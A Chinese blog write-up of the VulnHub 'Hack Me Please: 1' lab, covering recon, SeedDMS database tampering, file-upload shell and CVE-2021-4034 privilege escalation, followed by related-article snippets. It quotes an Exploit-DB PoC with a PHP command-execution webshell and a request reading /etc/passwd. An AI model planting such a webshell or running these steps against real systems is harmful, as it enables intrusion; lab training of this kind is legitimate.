vulnhub靶机 hack me place1

最新推荐文章于 2024-08-24 22:16:54 发布
最新推荐文章于 2024-08-24 22:16:54 发布
阅读量65 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53665747/article/details/131985947
版权

端口信息

mysql空密码登录尝试

web探测

 

这里用了moonlight这个模板,但是没有公开漏洞信息。

目录爆破并没有什么明显信息

到这没思路了,看了别人的wp原来是从js入手

信息收集过程中不能忽视js的收集,有时可能会有接口信息。

main.js下发现存在接口信息。

是一个登录界面。

可以看到具体版本信息

去搜5.1.22大部分都是xss。

看一下5.1.10 searchsploit中的那个漏洞

# Exploit Title: [Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11]
# Google Dork: [NA]
# Date: [20-June-2019]
# Exploit Author: [Nimit Jain](https://www.linkedin.com/in/nimitiitk)(https://secfolks.blogspot.com)
# Vendor Homepage: [https://www.seeddms.org]
# Software Link: [https://sourceforge.net/projects/seeddms/files/]
# Version: [SeedDMS versions <5.1.11] (REQUIRED)
# Tested on: [NA]
# CVE : [CVE-2019-12744]

Exploit Steps:

Step 1: Login to the application and under any folder add a document.
Step 2: Choose the document as a simple php backdoor file or any backdoor/webshell could be used.

PHP Backdoor Code:
<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.

Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.

需要进入后台登录。

对这个目录爆破的时候发现了webdav

可以用cewl成字典去跑一下

这里seeddms源码可以在github上找到

可以settings中有部分信息,但是没什么用。

 

但是后续目录爆破可以看到存在一个配置文件

刚刚那个是模板文件,这个才是正式的配置文件,没有想到删除template

连接成功

seeddms user表下存在一组账号密码,尝试发现不是网站账户

这下应该是了

这里没有得到hash,不过我们可以改下数据库

生成md5

 

文件上传

searchsploit给的exp不能直接用,但是也给出了上传的点

 

 注意路径拼接需要去掉第二个目录

Getshell

提权

看到最后一行存在这个命令 cve 2021 4034

代码利用链接

 

 另外这里看到家目录下有一个saket用户,尝试用之前得到的账号密码登录

 成功登录并且是全权限

信息收集记得山穷水尽时候去找找js,看能否发现什么接口信息,并且得到一个具体的cms版本外,一个是找公开利用漏洞,另一个去找源码,看有什么可用信息。

Eminem_zzzz
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub 靶场 HACK ME PLEASE: 1
weixin_52374319的博客
05-11 535
Vulnhub 靶场 HACK ME PLEASE: 1 前期准备工作: 靶机下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/ kali攻击机ip地址:192.168.43.135(桥接) 靶机地址:192.168.43.228(桥接) 信息收集: 靶机地址: netdiscover -r 192.168.43.0/24 开放端口: nmap -p 1-65535 192.168.43.228 发现80,3306,33060端口开放
[Vulnhub靶机] DC-1
haosha。的博客
05-07 4130
[Vulnhub靶机]DC-1靶机渗透思路及方法(个人分享)
看完这篇 教你玩转渗透测试靶机vulnhub——Hack Me Please: 1
Aluxian_的博客
02-12 1891
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。这是一个Web的漏洞靶机,老样子需要找到flag即可。①.这里的知识点是知道seeddmsCMS找不i到的话就访问不了就不能nc反弹shell③.数据库的基本命令使用会改密码 还有sudo提权希望对热爱打靶机的小伙伴有帮助!最后创作不易 希望对大家有所帮助 喜欢的话麻烦大家给个一键三连 你的开心就是我最大的快乐!!
vulnhub靶机DC1
weixin_52450702的博客
10-29 966
靶机DC1IP:192.168.70.160。
Vulnhub靶机Hack_Me_Please
qq_48904485的博客
01-28 488
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机Hack_Me_Please(10.0.2.39)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/hack-me-please-1,731/
vulnhub靶机corrosion1
weixin_52450702的博客
11-18 715
vulnhub靶机corrosion1
Vulnhub靶机之reven 1
2301_76227305的博客
06-09 730
这个靶机不算难,挺简单的,这些工具的使用也都是常见的。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
Vulnhub靶机-Prime1
m0_74855736的博客
03-08 1039
前面目录扫描可以发现有使用WordPress,现在又获得一个密码,这边尝试wpscan去获得一个用户再配合刚刚获得的一个密码。ls #/home目录在Linux称为主目录,在该目录下面存储的是每个用户的目录。从右侧的页面一个个找php页面且带有提交按钮的,这个目录就是有写权限的。根据前面提示对获得的两个php文件参数的模糊测试,最终在index.php获得一个正确的参数是file。主题编辑器,一般来说从主题编辑器容易有有写权限的一些目录,通过遍历来看看哪些目录有写权限。
vulnhub靶机-CHILL HACK: 1
臭nana的博客
12-21 1030
靶机描述:提示枚举 1、找到靶机ip:192.168.74.135 nmap -sn 192.168.74.0/24 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.74.135 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for 192.168.74.135 Host is up (0.0044s latency). Not shown: 65532 closed ports PO
Vulnhub靶机:DJINN_ 1
LainWith的博客
02-03 1683
目录介绍信息收集主机发现主机信息探测测试1337端口测试21端口(ftp)测试7331端口(web)尝试目录扫描命令执行-反弹shell获取第一个Flag提权获取第二个Flag总结参考 介绍 系列:djinn(此系列共3台) 发布日期:2019 年 11 月 18 日 难度:初级-中级 Flag : 2个,普通用户的user.txt和root用户的root.txt 学习: gobuster 目录扫描 ftp 匿名登录 bypass 命令执行漏洞 反弹 shell 的使用 靶机地址:https://www
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
第135天:内网安全-横向移动&非约束委派&约束委派&数据库攻防
最新发布
weixin_71529930的博客
08-24 404
非约束委派存在不安全性,所以微软在Windows server 2003中引入了约束委派,约束委派攻击主要利用被控主机设置了域控的CIFS服务的约束委派,则攻击者可以先使用S4u2seflt申请域管用户访问被控主机的ST1,然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控。攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管。利用该身份就可以访问域控,记得用主机名去访问。(域控)访问具有非约束委派权限的机器。
【办公软件】安全风险 Microsoft 已阻止宏运行,因为此文件的来源不受信任
一点硬件
08-20 404
安全风险 Microsoft 已阻止宏运行 因为此文件的来源不受信任
SD-WAN安全:在灵活性与安全性之间找到平衡
A526847的博客
08-21 496
随着企业业务的不断扩展和数字化转型的加速,网络架构的灵活性和安全性成为了企业关注的重点。SD-WAN(软件定义广域网)作为一种新兴的网络架构,通过软件定义和虚拟化技术,为企业提供了更灵活、可靠、经济高效的广域网连接方案。然而,在追求灵活性的同时,如何确保网络的安全性,成为了SD-WAN应用中的一大挑战。本文将探讨SD-WAN如何在灵活性与安全性之间找到平衡。
车辆电子围栏系统:守护爱车安全的智能新防线
2301_81759256的博客
08-20 521
在未来,随着技术的不断进步和应用的持续深化,我们有理由相信,车辆电子围栏系统将会为更多车主带来安心与便捷,共同守护每一段旅程的平安与美好。车主可以根据自己的实际需求,自由设定围栏的范围大小、形状及预警方式,无论是家庭住址、公司停车位还是孩子的学校周边,都能成为保护爱车的安全区域。一旦车辆跨越这个预设的“围栏”,系统便会立即触发警报,通过手机APP、短信或电话等多种方式通知车主,实现对车辆位置的实时监控与异常行为的即时响应。其中,车辆电子围栏系统作为一项创新的安全技术,正悄然成为车主们守护爱车安全的新宠。
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值